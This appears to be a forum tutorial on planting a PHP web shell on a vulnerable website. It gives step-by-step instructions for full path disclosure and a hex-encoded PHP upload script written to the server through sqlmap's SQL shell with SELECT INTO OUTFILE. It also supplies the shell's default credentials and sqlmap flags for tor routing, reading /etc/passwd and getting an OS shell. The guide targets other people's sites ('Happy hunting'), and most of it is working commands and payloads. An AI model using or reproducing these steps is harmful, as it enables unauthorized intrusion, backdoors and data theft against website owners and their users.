what you need:?
A PHP Shell^
A upload script^ (optional might work without)
sqlmap^ (optional but makes it so much easier)
what is a shell?
Shell is a shell wrapped in a script. It's a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree a SSH connection.
You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc can be used.
There are some limitations on what kind of programs you can run. It won't do no good if you start a graphical program like Firefox or even a console based one like vi. All programs have to be strictly command line programs, and they will have no chance of getting user input after they have been launched.They probably also have to terminate within 30 seconds, as this is the default time-limit imposed unto all PHP scripts, to prevent them from running in an infinite loop. Your ISP may have set this time-limit to something else.
But you can rely on all the normal shell-functionality, like pipes, output and input redirection, etc
source^
so lets start
1. After finding a vulnerable site you need to get
Full Path Disclosure^
I will use the empty array exploit, add the brackets []
http://www.example.com/index.php?id[]=1gives
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59now we have the path
2. now you need to
convert your upload script to hex^
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>becomes
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
3. Now lets fire up sqlmap with a sql-shell and inject
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shelllet sqlmap do its magic and after a while you will get a sql-shell
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
now write
SELECT
0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
don't forget the 0x before your hex, so it soul look like
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";
After a few seconds you should get a confirmation if it was successful or not
4. browse to
http://www.example.com/upload.php and upload the php shell
5. browse to your php shell and login
Info:The username and password for the shell is cyber, gladiator, you can change this in the php file, this specific shell must be named cyb3r-sh3ll.php or it will not work
Think about having a unique name for your upload file so you don't overwrite some existing file, if you change name you also need to change the source.
Extra:You don't need to use sqlmap you can simply run the select statement in your browser it requires a bit more work tho.
A theory is that you can inject the full shellcode directly instead of first writing the uploader, the problems is that this specific shell is 268kB but maybe with a smaller shell
sqlmap is really powerful tool you can do shitt load of stuff with it here are some functions i find helpfull:
-o optimization
--threads=1-10 nr of threads (faster)
--dbms=mysql backend dbms (faster)
--level=1-5 more-tests
--risk=1-3 more-tests
--tor-port=xxxx connect through tor
--random-agent random user agent
--file-read=/etc/passwd read local file
--file-write=/etc/passwd write file to remote machine must be used with file-dest
--file-dest=/etc/passwd where to write the file-write
--os-shell like the sql-shell but system
--wizard for beginners
--check-waf Check for WAF/IPS/IDS protection
there are many more just check them out
The --file-read/write does not work most of the times maybe im doing something wrong thats why i use sql-shell to write files or do specific commands.
--os-shell is awesome, you cant write php code to disk tho.
well that was it i think, please share your thoughts/concerns or my mistakes
Happy hunting
